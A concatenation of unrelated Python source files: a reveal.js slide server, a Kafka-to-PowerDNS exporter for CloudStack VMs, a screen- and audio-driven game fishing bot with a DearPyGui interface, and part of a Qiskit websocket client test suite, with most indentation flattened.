elif os.path.isdir(os.path.join(dirname, self.reveal_prefix)):
# reveal prefix exists
self.log.info("Serving local %s", self.reveal_prefix)
else:
self.log.info("Redirecting %s requests to %s", self.reveal_prefix, self.reveal_cdn)
handlers.insert(0, (r"/(%s)/(.*)" % self.reveal_prefix, ProxyHandler))
app = web.Application(handlers,
cdn=self.reveal_cdn,
client=AsyncHTTPClient(),
)
# hook up tornado logging to our logger
log.app_log = self.log
http_server = httpserver.HTTPServer(app)
http_server.listen(self.port, address=self.ip)
url = "http://%s:%i/%s" % (self.ip, self.port, filename)
print("Serving your slides at %s" % url)
print("Use Control-C to stop this server")
if self.open_in_browser:
try:
browser = webbrowser.get(self.browser or None)
b = lambda: browser.open(url, new=2)
threading.Thread(target=b).start()
except webbrowser.Error as e:
self.log.warning('No web browser found: %s.' % e)
browser = None
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print("\nInterrupted")
def main(path):
"""allow running this module to serve the slides"""
server = ServePostProcessor()
server(path)
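# Minimal usage sketch (illustrative only, never called here): serve an
# already-exported reveal.js slideshow; the file name below is hypothetical.
def _serve_example():
    server = ServePostProcessor(port=8000, open_in_browser=False)
    server("slides.slides.html")  # blocks until interrupted, like main() below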
if __name__ == '__main__':
import sys
main(sys.argv[1])
|
exporter.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys
sys.path.append(".")
import logging
import json
import os
from signal import SIGKILL
from kafka import KafkaConsumer, TopicPartition
from multiprocessing import Process
from multiprocessing import Queue
from Queue import Empty
import mysql.connector
from cs import CloudStack, CloudStackException
from lib.virtual_machine import VirtualMachine
from lib.account import Account
FORMAT = '%(asctime)-15s %(message)s'
logging.basicConfig(format=FORMAT, stream=sys.stderr, level=logging.INFO)
kafka_bootstrap_hosts = os.environ["KAFKA_BOOTSTRAP"]
kafka_topic = os.environ["KAFKA_TOPIC"]
kafka_group = os.environ["KAFKA_GROUP"]
mysql_pdns_name = os.environ['MYSQL_PDNS_NAME']
mysql_pdns_user = os.environ['MYSQL_PDNS_USER']
mysql_pdns_password = os.environ['MYSQL_PDNS_PASSWORD']
mysql_pdns_host = os.environ['MYSQL_PDNS_HOST']
mysql_pdns_port = int(os.environ['MYSQL_PDNS_PORT'])
cs_endpoint = os.environ['CS_ENDPOINT']
cs_api_key = os.environ['CS_API_KEY']
cs_secret_key = os.environ['CS_SECRET_KEY']
dns_record_ttl = os.environ['DNS_RECORD_TTL']
dns_common_zone = os.environ['DNS_COMMON_ZONE']
dns_add_to_common_zone = os.environ['DNS_ADD_TO_COMMON_ZONE']
deadlock_interval = os.environ['DEADLOCK_INTERVAL']
def get_mysql():
return mysql.connector.connect(host=mysql_pdns_host, port=mysql_pdns_port,
user=mysql_pdns_user, passwd=mysql_pdns_password, database=mysql_pdns_name)
pdns_conn = get_mysql()
pdns_cursor = pdns_conn.cursor()
pdns_cursor.execute(
"CREATE TABLE IF NOT EXISTS cs_mapping(uuid CHAR(36), record VARCHAR(255), ipaddress CHAR(39), "
"UNIQUE(uuid, record, ipaddress))")
pdns_conn.commit()
pdns_cursor.close()
pdns_conn.close()
consumer = KafkaConsumer(kafka_topic,
auto_offset_reset='earliest',
group_id=kafka_group,
bootstrap_servers=kafka_bootstrap_hosts.split(","),
value_deserializer=lambda m: json.loads(m.decode('utf8')),
enable_auto_commit=False)
cs = CloudStack(endpoint=cs_endpoint,
key=cs_api_key,
secret=cs_secret_key)
def extract_create_payload(job_result):
job_result = job_result.replace("org.apache.cloudstack.api.response.UserVmResponse/virtualmachine/", "", 1)
return json.loads(job_result)
def update_a_zone(cursor, account, vm, domain):
cursor.execute("SELECT id FROM domains WHERE name = %s", (domain,))
fqdn = vm.name + "." + domain
row = cursor.fetchone()
if row is not None:
domain_id = row[0]
cursor.execute(
"""REPLACE INTO records (name, type, content, ttl, prio, change_date, ordername, auth, domain_id)
VALUES (%s, 'A', %s, %s, 0, UNIX_TIMESTAMP(), %s, 1, %s)""",
(fqdn, vm.ip4, dns_record_ttl, vm.name, domain_id))
if vm.ip6 is not None:
cursor.execute(
"""REPLACE INTO records (name, type, content, ttl, prio, change_date, ordername, auth, domain_id)
VALUES (%s, 'AAAA', %s, %s, 0, UNIX_TIMESTAMP(), %s, 1, %s)""",
(fqdn, vm.ip6, dns_record_ttl, vm.name, domain_id))
cursor.execute("""INSERT IGNORE INTO cs_mapping (uuid, record) VALUES(%s,%s)""", (vm.uuid, fqdn))
group_fqdn = vm.group_fqdn(account, domain)
if group_fqdn:
logging.info("Group FQDN: %s" % group_fqdn)
cursor.execute(
"""REPLACE INTO records (name, type, content, ttl, prio, change_date, ordername, auth, domain_id)
VALUES (%s, 'A', %s, %s, 0, UNIX_TIMESTAMP(), %s, 1, %s)""",
(group_fqdn, vm.ip4, dns_record_ttl, vm.name, domain_id))
cursor.execute("""INSERT IGNORE INTO cs_mapping (uuid, record, ipaddress) VALUES (%s,%s,%s)""",
(vm.uuid, group_fqdn, vm.ip4))
if vm.ip6 is not None:
cursor.execute(
"""REPLACE INTO records (name, type, content, ttl, prio, change_date, ordername, auth, domain_id)
VALUES (%s, 'AAAA', %s, %s, 0, UNIX_TIMESTAMP(), %s, 1, %s)""",
(group_fqdn, vm.ip6, dns_record_ttl, vm.name, domain_id))
cursor.execute("""INSERT IGNORE INTO cs_mapping (uuid, record, ipaddress) VALUES (%s,%s,%s)""",
(vm.uuid, group_fqdn, vm.ip6))
def update_ptr_zone(cursor, vm):
cursor.execute("SELECT id FROM domains WHERE name = %s", (vm.ip4_ptr_zone,))
row = cursor.fetchone()
if row is not None:
domain_id = row[0]
cursor.execute(
"""REPLACE INTO records (name, type, content, ttl, prio, change_date, auth, domain_id)
VALUES (%s, 'PTR', %s, %s, 0, UNIX_TIMESTAMP(), 1, %s)""",
(vm.ip4_ptr, vm.fqdn, dns_record_ttl, domain_id))
cursor.execute("""INSERT IGNORE INTO cs_mapping (uuid, record) VALUES(%s,%s)""", (vm.uuid, vm.ip4_ptr))
if vm.ip6 is not None:
cursor.execute("SELECT id FROM domains WHERE name = %s", (vm.ip6_ptr_zone,))
row = cursor.fetchone()
if row is not None:
domain_id = row[0]
cursor.execute(
"""REPLACE INTO records (name, type, content, ttl, prio, change_date, auth, domain_id)
VALUES (%s, 'PTR', %s, %s, 0, UNIX_TIMESTAMP(), 1, %s)""",
(vm.ip6_ptr, vm.fqdn, dns_record_ttl, domain_id))
cursor.execute("""INSERT IGNORE INTO cs_mapping (uuid, record) VALUES(%s,%s)""", (vm.uuid, vm.ip6_ptr))
def create_new_records(m):
jr = "jobResult"
def create_match():
return "commandEventType" in m \
and "status" in m \
and m["commandEventType"].lower() == "VM.CREATE".lower() \
and m["status"].lower() == "SUCCEEDED".lower()
def start_match():
return "commandEventType" in m \
and "status" in m \
and m["commandEventType"].lower() == "VM.START".lower() \
and m["status"].lower() == "SUCCEEDED".lower()
is_create_event = create_match()
is_start_event = start_match()
if is_create_event or is_start_event:
account = Account(
cs_api=cs,
cmd_info=m)
job_result = extract_create_payload(m[jr])
vm = VirtualMachine(
cs_api=cs,
vm_info=job_result)
if not (vm.domain and vm.ip4):
return
vm.dump()
c = pdns_conn.cursor()
        # Delete old A records for this VM before re-adding them
c.execute("DELETE FROM records WHERE name = %s", (vm.fqdn,))
# Add A, AAAA records
if dns_add_to_common_zone == 'true':
update_a_zone(c, account, vm, dns_common_zone)
if account.network_domain:
update_a_zone(c, account, vm, account.network_domain)
else:
update_a_zone(c, account, vm, vm.domain)
# Add PTR records, except when VM is started
if not is_start_event:
update_ptr_zone(c, vm)
pdns_conn.commit()
c.close()
def delete_removed_records(m):
vm_field = "VirtualMachine"
status_field = "status"
status_value = "Completed"
event_field = "event"
event_value = "VM.DESTROY"
if vm_field in m \
and status_field in m \
and event_field in m \
and m[status_field].lower() == status_value.lower() \
and m[event_field].lower() == event_value.lower():
vm_uuid = m[vm_field].lower()
c = pdns_conn.cursor()
c.execute("SELECT record, ipaddress FROM cs_mapping where uuid = %s", (vm_uuid,))
rows = c.fetchall()
for r in rows:
logging.info("Deleting DNS entries: record=%s, ipaddress=%s" % r)
if r[1]:
c.execute("DELETE FROM records WHERE name = %s AND content = %s", r)
else:
c.execute("DELETE FROM records WHERE name = %s", (r[0],))
c.execute("DELETE FROM cs_mapping WHERE uuid = %s", (vm_uuid,))
pdns_conn.commit()
c.close()
def monitor(q, pid):
while True:
try:
q.get(timeout=int(deadlock_interval))
except Empty:
break
logging.info("No events in %s seconds. May be internal deadlock happened. Reset the system." % deadlock_interval)
os.kill(pid, SIGKILL)
exit(0)
if __name__ == '__main__':
q = Queue()
pid = os.getpid()
mon = Process(target=monitor, args=(q, pid))
mon.start()
while True:
msgs = consumer.poll(1000, 10)
if bool(msgs):
msgs = msgs[TopicPartition(topic=kafka_topic, partition=0)]
for m in msgs:
m = m.value
try:
pdns_conn = get_mysql()
create_new_records(m)
delete_removed_records(m)
pdns_conn.close()
consumer.commit()
except CloudStackException:
pass
q.put(m)
|
Fisherman.py
|
import sys
import pyautogui, pyaudio, audioop, threading, time, win32api, configparser, mss, mss.tools, cv2, numpy
from dearpygui.core import *
from dearpygui.simple import *
import random, os
from datetime import datetime
# Loads Settings
parser = configparser.ConfigParser()
if not parser.read("settings.ini"):
    sys.exit("settings.ini not found!")
debugmode = parser.getboolean("Settings", "debug")
resolution = parser.getint("Settings", "game_resolution")
max_volume = parser.getint("Settings", "Volume_Threshold")
screen_area = parser.get("Settings", "tracking_zone")
coord_bait = parser.get("Settings", "bait_inventory")
coord_food = parser.get("Settings", "food_inventory")
detection_threshold = parser.getfloat("Settings", "detection_threshold")
last_food_time = parser.get("Settings", "last_food_time")
dist_launch_time1 = parser.getfloat("Settings", "launch_time1")
dist_launch_time2 = parser.getfloat("Settings", "launch_time2")
dist_launch_time3 = parser.getfloat("Settings", "launch_time3")
dist_launch_time4 = parser.getfloat("Settings", "launch_time4")
cast_time = parser.getint("Settings", "cast_time")
screen_area = screen_area.strip("(")
screen_area = screen_area.strip(")")
cordies = screen_area.split(",")
screen_area = int(cordies[0]), int(cordies[1]), int(cordies[2]), int(cordies[3])
bobber_img = ("bobber-1024-768.png", "bobber-1280x720.png", "bobber-1600x1024.png")
# print(bobber_img[0])
# screen_area = x1,y1,x2,y2
# resolution game
resolutions = ["1024x768", "1080x720", "1600x1024"]
# Coords for fishing spots
coords = []
# print(coord_bait)
coord_bait = coord_bait.strip("(")
coord_bait = coord_bait.strip(")")
# (coord_bait)
xy_bait = coord_bait.split(",")
coord_bait = int(xy_bait[0]), int(xy_bait[1])
# print(coord_food)
coord_food = coord_food.strip("(")
coord_food = coord_food.strip(")")
# (coord_food)
xy_food = coord_food.split(",")
coord_food = int(xy_food[0]), int(xy_food[1])
# Sound Volume
total = 0
# Current Bot State
STATE = "IDLE"
# Thread Stopper
stop_button = False
# Stuff for mouse events
state_left = win32api.GetKeyState(0x01)
state_right = win32api.GetKeyState(0x02)
# fish counters
fish_count = 0
bait_counter = 0
food_bait = 0
food_used = 0
##########################################################
#
# These Functions handle bot state / minigame handling
#
##########################################################
# Scans the current input volume
def check_volume():
global total, STATE, max_volume, stop_button
p = pyaudio.PyAudio()
stream = p.open(
format=pyaudio.paInt16,
channels=2,
rate=44100,
input=True,
frames_per_buffer=1024,
)
current_section = 0
while 1:
if stop_button == False:
total = 0
for i in range(0, 2):
data = stream.read(1024)
                reading = audioop.max(data, 2)
                total = total + reading
if (
total > max_volume
and STATE != "SOLVING"
and STATE != "DELAY"
and STATE != "CASTING"
):
do_minigame()
else:
break
def get_new_spot():
return random.choice(coords)
# Runs the casting function
def cast_hook():
global STATE, stop_button
while 1:
if stop_button == False:
if STATE == "CASTING" or STATE == "STARTED":
time.sleep(2.6)
pyautogui.mouseUp()
x, y, n = get_new_spot()
pyautogui.moveTo(x, y, tween=pyautogui.linear, duration=0.2)
time.sleep(0.7)
log_info(f"Casted towards:{x,y}", logger="Information")
pyautogui.mouseDown()
if n == 1:
time.sleep(
random.uniform(dist_launch_time1 - 0.2, dist_launch_time1)
)
elif n == 2:
time.sleep(
random.uniform(dist_launch_time2 - 0.2, dist_launch_time2)
)
elif n == 3:
time.sleep(
random.uniform(dist_launch_time3 - 0.2, dist_launch_time3)
)
elif n == 4:
time.sleep(
random.uniform(dist_launch_time4 - 0.2, dist_launch_time4)
)
pyautogui.mouseUp()
time.sleep(2.5)
STATE = "CAST"
elif STATE == "CAST":
time.sleep(cast_time)
if STATE == "CAST":
log_warning(
f"Seems to be stuck on cast. Recasting", logger="Information"
)
pyautogui.press("r")
time.sleep(0.25)
pyautogui.click(clicks=2, interval=0.15)
time.sleep(0.25)
STATE = "CASTING"
cast_hook()
else:
break
# Uses obj detection with OpenCV to find and track bobbers left / right coords
def do_minigame():
global STATE, fish_count, bait_counter
if STATE != "CASTING" and STATE != "STARTED":
STATE = "SOLVING"
log_debug(f"Attempting Minigame", logger="Information")
pyautogui.mouseDown()
pyautogui.mouseUp()
# Initial scan. Waits for bobber to appear
time.sleep(0.25)
valid, location, size = Detect_Bobber()
if valid == "TRUE":
fish_count += 1
bait_counter += 1
while 1:
valid, location, size = Detect_Bobber()
if valid == "TRUE":
if location[0] < size * 0.6:
pyautogui.mouseDown()
else:
pyautogui.mouseUp()
else:
if STATE != "CASTING":
STATE = "CASTING"
pyautogui.mouseUp()
break
else:
STATE = "CASTING"
def food_check():
global last_food_time, food_used, stop_button, STATE
while True:
if stop_button == False:
if STATE != "IDLE":
current_time = datetime.now().time().strftime("%H:%M")
x = datetime.strptime(last_food_time, "%H:%M")
y = datetime.strptime(current_time, "%H:%M")
diff_time = (y - x).total_seconds() / 60.0
if diff_time > 30:
log_info(f"Using Food!. Time: {current_time}", logger="Information")
pyautogui.press("2")
time.sleep(0.3)
food_used += 1
last_food_time = current_time
fp = open("settings.ini")
p = configparser.ConfigParser()
p.read_file(fp)
p.set("Settings", "last_food_time", str(current_time))
p.write(open(f"Settings.ini", "w"))
log_info(
f"Saved new food time to settings.ini", logger="Information"
)
if food_used == 10:
pyautogui.press("i")
x = int(coord_food[0])
y = int(coord_food[1])
pyautogui.moveTo(x, y, tween=pyautogui.linear, duration=0.2)
time.sleep(0.3)
log_info(f"Reloading food...", logger="Information")
pyautogui.click(button="right", interval=0.25)
time.sleep(0.3)
pyautogui.press("i")
food_used = 0
else:
break
##########################################################
#
# These Functions are all Callbacks used by DearPyGui
#
##########################################################
# Generates the areas used for casting
def generate_coords(sender, data):
global coords, STATE, state_left
amount_of_choords = get_value("Amount Of Spots")
for n in range(int(amount_of_choords)):
n = n + 1
temp = []
log_info(
f"[spot:{n}]|Press Spacebar over the spot you want", logger="Information"
)
time.sleep(1)
while True:
a = win32api.GetKeyState(0x20)
if a != state_left:
state_left = a
if a < 0:
break
time.sleep(0.001)
x, y = pyautogui.position()
temp.append(x)
temp.append(y)
temp.append(n)
coords.append(temp)
log_info(f"Position:{n} Saved. | {x,y}", logger="Information")
# generate location bait inventory
def bait_coords(sender, data):
global coord_bait, state_left
for n in range(1):
n = n + 1
temp = []
log_info(
f"[Bait:{n}]|Press Spacebar over the bait in inventory",
logger="Information",
)
time.sleep(1)
while True:
a = win32api.GetKeyState(0x20)
if a != state_left:
state_left = a
if a < 0:
break
time.sleep(0.001)
x, y = pyautogui.position()
coord_bait = x, y
log_info(f"Updated bait inventory to {coord_bait}", logger="Information")
def food_coords(sender, data):
global coord_food, state_left
for n in range(1):
n = n + 1
temp = []
log_info(
f"[Food:{n}]|Press Spacebar over the food in inventory",
logger="Information",
)
time.sleep(1)
while True:
a = win32api.GetKeyState(0x20)
if a != state_left:
state_left = a
if a < 0:
break
time.sleep(0.001)
x, y = pyautogui.position()
coord_food = x, y
log_info(f"Updated food inventory to {coord_food}", logger="Information")
# Sets tracking zone for image detection
def Grab_Screen(sender, data):
global screen_area
state_left = win32api.GetKeyState(0x20)
image_coords = []
log_info(
f"Please hold and drag space over tracking zone (top left to bottom right)",
logger="Information",
)
while True:
a = win32api.GetKeyState(0x20)
if a != state_left: # Button state changed
state_left = a
if a < 0:
x, y = pyautogui.position()
image_coords.append([x, y])
else:
x, y = pyautogui.position()
image_coords.append([x, y])
break
time.sleep(0.001)
start_point = image_coords[0]
end_point = image_coords[1]
screen_area = start_point[0], start_point[1], end_point[0], end_point[1]
log_info(f"Updated tracking area to {screen_area}", logger="Information")
# Detects bobber in tracking zone using openCV
def change_bober(val):
if val == 0:
return cv2.imread(bobber_img[0])
elif val == 1:
return cv2.imread(bobber_img[1])
elif val == 2:
return cv2.imread(bobber_img[2])
else:
log_info(f"Please Select Game Resolution", logger="Information")
return cv2.imread("bobber.png")
def Detect_Bobber():
global detection_threshold
start_time = time.time()
with mss.mss() as sct:
base = numpy.array(sct.grab(screen_area))
base = numpy.flip(base[:, :, :3], 2) # 1
base = cv2.cvtColor(base, cv2.COLOR_RGB2BGR)
bobber = change_bober(resolution)
bobber = numpy.array(bobber, dtype=numpy.uint8)
bobber = numpy.flip(bobber[:, :, :3], 2) # 1
bobber = cv2.cvtColor(bobber, cv2.COLOR_RGB2BGR)
result = cv2.matchTemplate(base, bobber, cv2.TM_CCOEFF_NORMED)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result)
# if max_val > 0.5:
if max_val > detection_threshold:
print(f"Bobber Found!. certainty:{round(max_val,4)}")
print("%s s to calculate" % (round(time.time() - start_time, 4)))
return ["TRUE", max_loc, base.shape[1]]
else:
print(f"Bobber not found. certainty:{round(max_val,4)}")
print("%s s to calculate" % (round(time.time() - start_time, 4)))
return ["FALSE", max_loc, base.shape[1]]
# Starts the bots threads
def start(data, sender):
global max_volume, stop_button, STATE
STATE = "STARTING"
stop_button = False
volume_manager = threading.Thread(target=check_volume, name="VOLUME CHECK MANAGE")
hook_manager = threading.Thread(target=cast_hook, name="CAST HOOK MANAGE")
food_manager = threading.Thread(target=food_check, name="FOOD MANAGER")
if stop_button == False:
max_volume = get_value("Set Volume Threshold")
if len(coords) == 0:
log_info(f"Please Select Fishing Coords first", logger="Information")
return
else:
pyautogui.mouseUp()
x, y, n = get_new_spot()
pyautogui.moveTo(x, y, tween=pyautogui.linear, duration=0.2)
time.sleep(0.25)
pyautogui.mouseDown()
time.sleep(0.15)
pyautogui.mouseUp()
time.sleep(0.15)
pyautogui.press("1")
time.sleep(2.2)
food_manager.start()
log_info(f"Food Manager Started", logger="Information")
time.sleep(0.2)
volume_manager.start()
log_info(f"Volume Scanner Started", logger="Information")
hook_manager.start()
log_info(f"Hook Manager Started", logger="Information")
log_info(f"Bot Started", logger="Information")
STATE = "STARTED"
else:
log_error(f"Invalid KEY", logger="Information")
# Stops the bot and closes active threads
def stop(data, sender):
global stop_button, STATE
STATE = "STOPPING"
stop_button = True
log_info(f"Stopping Hook Manager", logger="Information")
log_info(f"Stopping Volume Scanner", logger="Information")
pyautogui.mouseUp()
STATE = "STOPPED"
coords.clear()
log_info(f"Stopped Bot. Please re-spot!", logger="Information")
# Updates Bot Volume
def save_volume(sender, data):
global max_volume
max_volume = get_value("Set Volume Threshold")
log_info(f"Max Volume Updated to :{max_volume}", logger="Information")
# Set detection threshold
def save_threshold(sender, data):
global detection_threshold
detection_threshold = get_value("Set Detection Threshold")
log_info(
f"Detection Threshold Updated to :{detection_threshold}", logger="Information"
)
# Set time launch dist
def save_dist_launch_time1(sender, data):
global dist_launch_time1
dist_launch_time1 = get_value("Set Time Launch Distance 1")
log_info(
f"Dist time 1 launch Updated to :{dist_launch_time1}", logger="Information"
)
def save_dist_launch_time2(sender, data):
global dist_launch_time2
dist_launch_time2 = get_value("Set Time Launch Distance 2")
log_info(
f"Dist time 2 launch Updated to :{dist_launch_time2}", logger="Information"
)
def save_dist_launch_time3(sender, data):
global dist_launch_time3
dist_launch_time3 = get_value("Set Time Launch Distance 3")
log_info(
f"Dist time 3 launch Updated to :{dist_launch_time3}", logger="Information"
)
def save_dist_launch_time4(sender, data):
global dist_launch_time4
dist_launch_time4 = get_value("Set Time Launch Distance 4")
log_info(
f"Dist time 4 launch Updated to :{dist_launch_time4}", logger="Information"
)
def save_cast_time(sender, data):
global cast_time
cast_time = get_value("Set Cast Time")
log_info(f"Cast time Updated to :{cast_time}", logger="Information")
# save modify resolution bobber
def save_resolution(sender, data):
global resolution
resolution = get_value("Set Game Resolution")
log_info(
f"Resolution Game Updated to :{resolutions[resolution]}", logger="Information"
)
# Title Tracking
def Setup_title():
global bait_counter
global food_bait
while 1:
set_main_window_title(
f"Fisherman | Status:{STATE} | Fish Hits:{fish_count} |Current Volume: {total} / {max_volume} |"
)
time.sleep(0.05)
if bait_counter >= 10:
bait_counter = 0
food_bait += 1
cal_bait = 10 - food_bait
log_info(f"Using Bait!. Proximaly reload: {cal_bait}", logger="Information")
pyautogui.press("1")
if food_bait == 10:
pyautogui.press("i")
x = int(coord_bait[0])
y = int(coord_bait[1])
pyautogui.moveTo(x, y, tween=pyautogui.linear, duration=0.2)
time.sleep(0.3)
log_info(f"Reloading bait...", logger="Information")
pyautogui.click(button="right", interval=0.25)
time.sleep(0.3)
pyautogui.press("i")
food_bait = 0
def Setup():
if os.path.exists("first_run.txt"):
return
else:
print("Detected first run...\nChecking Files.")
if os.path.exists("bobber.png"):
print("\U0001f44d" + " Found bobber.png")
else:
print(
"ERROR | No bobber.png found. Please obtain the bobber.png and restart."
)
exit("bobber error")
for i in bobber_img:
if os.path.exists(i):
print("\U0001f44d" + str(i))
else:
print(
"ERROR | No "
+ str(i)
+ " found. Please obtain the bobber.png and restart."
)
exit("bobber error")
if os.path.exists("settings.ini"):
print("\U0001f44d" + " Found settings.ini")
else:
print(
"ERROR | No settings.ini found. Please obtain the settings file and restart."
)
exit("settings error")
f = open("first_run.txt", "w")
f.write("ran = true")
f.close()
# Saves settings to settings.ini
def save_settings(sender, data):
    p = configparser.ConfigParser()
    with open("settings.ini") as fp:
        p.read_file(fp)
p.set("Settings", "game_resolution", str(resolution))
p.set("Settings", "volume_threshold", str(max_volume))
p.set("Settings", "tracking_zone", str(screen_area))
p.set("Settings", "bait_inventory", str(coord_bait))
p.set("Settings", "food_inventory", str(coord_food))
p.set("Settings", "detection_threshold", str(detection_threshold))
p.set("Settings", "launch_time1", str(dist_launch_time1))
p.set("Settings", "launch_time2", str(dist_launch_time2))
p.set("Settings", "launch_time3", str(dist_launch_time3))
p.set("Settings", "launch_time4", str(dist_launch_time4))
p.set("Settings", "cast_time", str(cast_time))
p.write(open(f"Settings.ini", "w"))
log_info(f"Saved New Settings to settings.ini", logger="Information")
# Settings for DearPyGui window
set_main_window_size(600, 500)
set_style_window_menu_button_position(0)
set_theme("Gold")
set_global_font_scale(1)
set_main_window_resizable(False)
# Creates the DearPyGui Window
with window("Fisherman Window", width=600, height=500):
set_window_pos("Fisherman Window", 0, 0)
add_input_int(
"Amount Of Spots", max_value=4, min_value=0, tip="Amount of Fishing Spots"
)
add_input_int(
"Set Volume Threshold",
max_value=100000,
min_value=0,
default_value=int(max_volume),
callback=save_volume,
tip="Volume Threshold to trigger catch event",
)
add_input_float(
"Set Detection Threshold",
min_value=0.1,
max_value=2.5,
default_value=detection_threshold,
callback=save_threshold,
)
# add_spacing(count = 3)
add_slider_float(
"Set Time Launch Distance 1",
min_value=0.3,
max_value=1.0,
default_value=dist_launch_time1,
callback=save_dist_launch_time1,
tip="Time to determine the launch distance 1",
)
add_slider_float(
"Set Time Launch Distance 2",
min_value=0.3,
max_value=1.0,
default_value=dist_launch_time2,
callback=save_dist_launch_time2,
tip="Time to determine the launch distance 2",
)
add_slider_float(
"Set Time Launch Distance 3",
min_value=0.3,
max_value=1.0,
default_value=dist_launch_time3,
callback=save_dist_launch_time3,
tip="Time to determine the launch distance 3",
)
add_slider_float(
"Set Time Launch Distance 4",
min_value=0.3,
max_value=1.0,
default_value=dist_launch_time4,
callback=save_dist_launch_time4,
tip="Time to determine the launch distance 4",
)
add_slider_int(
"Set Cast Time",
min_value=1,
max_value=60,
default_value=int(cast_time),
callback=save_cast_time,
tip="time to determine how long without getting fish",
)
add_listbox(
"Set Game Resolution",
items=resolutions,
default_value=int(resolution),
callback=save_resolution,
)
add_spacing(count=3)
add_button(
"Set Fishing Spots",
width=130,
callback=generate_coords,
tip="Starts function that lets you select fishing spots",
)
add_same_line()
add_button(
"Set Tracking Zone",
callback=Grab_Screen,
tip="Sets zone bot tracks for solving fishing minigame",
)
add_same_line()
add_button(
"Set Bait Inventory", callback=bait_coords, tip="Sets zone bot bait inventory"
)
add_same_line()
add_button(
"Set Food Inventory", callback=food_coords, tip="Sets zone bot food inventory"
)
add_spacing(count=5)
add_button("Start Bot", callback=start, tip="Starts the bot. Or press f1")
add_same_line()
add_button("Stop Bot", callback=stop, tip="Stops the bot. Or press f2")
add_same_line()
add_button(
"Save Settings",
callback=save_settings,
tip="Saves bot settings to settings.ini",
)
add_spacing(count=5)
add_logger("Information", log_level=0)
log_info(
f"Loaded Settings. Volume Threshold:{max_volume},Tracking Zone:{screen_area}, Cast Time: {cast_time},Debug Mode:{debugmode}",
logger="Information",
)
Setup()
threading.Thread(target=Setup_title).start()
start_dearpygui()
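# Hedged sketch (not part of the original script): the keys written to
# Settings.ini above could be read back with configparser roughly as below;
# the bot's real loading code may differ, and the helper name is made up.
def _load_settings_sketch(path="Settings.ini"):
    import configparser
    cfg = configparser.ConfigParser()
    cfg.read(path)
    s = cfg["Settings"]
    return {
        "resolution": s.get("game_resolution"),
        "max_volume": s.getint("volume_threshold"),
        "detection_threshold": s.getfloat("detection_threshold"),
        "cast_time": s.getint("cast_time"),
        "launch_times": [s.getfloat(f"launch_time{i}") for i in range(1, 5)],
    }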
|
test_websocket.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test for the Websocket client."""
import asyncio
from contextlib import suppress
import warnings
import sys
import importlib
import threading
import websockets
from qiskit.providers.ibmq.api.exceptions import (
WebsocketError, WebsocketTimeoutError, WebsocketIBMQProtocolError)
from qiskit.providers.ibmq.api.clients.websocket import WebsocketClient
from qiskit.providers.ibmq.utils.utils import RefreshQueue
from ...ibmqtestcase import IBMQTestCase
from .websocket_server import (
TOKEN_JOB_COMPLETED, TOKEN_JOB_TRANSITION, TOKEN_WRONG_FORMAT,
TOKEN_TIMEOUT, TOKEN_WEBSOCKET_RETRY_SUCCESS,
TOKEN_WEBSOCKET_RETRY_FAILURE, TOKEN_WEBSOCKET_JOB_NOT_FOUND,
websocket_handler)
TEST_IP_ADDRESS = '127.0.0.1'
INVALID_PORT = 9876
VALID_PORT = 8765
class TestWebsocketClient(IBMQTestCase):
"""Tests for the websocket client."""
def test_invalid_url(self):
"""Test connecting to an invalid URL."""
client = WebsocketClient('wss://{}:{}'.format(TEST_IP_ADDRESS, INVALID_PORT), None)
with self.assertRaises(WebsocketError):
asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
def test_asyncio_threading(self):
"""Test asyncio when importing webserver in new thread"""
def _import_websocket():
try:
importlib.reload(sys.modules["qiskit.providers.ibmq.api.clients.websocket"])
except RuntimeError:
self.fail("Importing websocket in new thread failed due to asyncio!")
thread = threading.Thread(target=_import_websocket)
thread.start()
thread.join()
class TestWebsocketClientMock(IBMQTestCase):
"""Tests for the the websocket client against a mock server."""
@classmethod
def setUpClass(cls):
"""Initial class level setup."""
super().setUpClass()
# Launch the mock server.
start_server = websockets.serve(websocket_handler, TEST_IP_ADDRESS, int(VALID_PORT))
cls.server = asyncio.get_event_loop().run_until_complete(start_server)
@classmethod
def tearDownClass(cls):
"""Class level cleanup."""
super().tearDownClass()
# Close the mock server.
loop = asyncio.get_event_loop()
cls.server.close()
loop.run_until_complete(cls.server.wait_closed())
with warnings.catch_warnings():
# Suppress websockets deprecation warning
warnings.filterwarnings("ignore", category=PendingDeprecationWarning)
warnings.filterwarnings("ignore", category=DeprecationWarning)
# Manually cancel any pending asyncio tasks.
if sys.version_info[0:2] < (3, 9):
pending = asyncio.Task.all_tasks()
else:
pending = asyncio.all_tasks(loop)
for task in pending:
task.cancel()
try:
with suppress(asyncio.CancelledError):
loop.run_until_complete(task)
except Exception as err: # pylint: disable=broad-except
cls.log.error("An error %s occurred canceling task %s. "
"Traceback:", str(err), str(task))
task.print_stack()
def test_job_final_status(self):
"""Test retrieving a job already in final status."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_JOB_COMPLETED)
response = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
self.assertIsInstance(response, dict)
self.assertIn('status', response)
self.assertEqual(response['status'], 'COMPLETED')
def test_job_transition(self):
"""Test retrieving a job that transitions to final status."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_JOB_TRANSITION)
response = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id'))
self.assertIsInstance(response, dict)
self.assertIn('status', response)
self.assertEqual(response['status'], 'COMPLETED')
def test_timeout(self):
"""Test timeout during retrieving a job status."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_TIMEOUT)
with self.assertRaises(WebsocketTimeoutError):
_ = asyncio.get_event_loop().run_until_complete(
client.get_job_status('job_id', timeout=2))
def test_invalid_response(self):
"""Test unparseable response from the server."""
client = WebsocketClient('ws://{}:{}'.format(
TEST_IP_ADDRESS, VALID_PORT), TOKEN_WRONG_FORMAT)
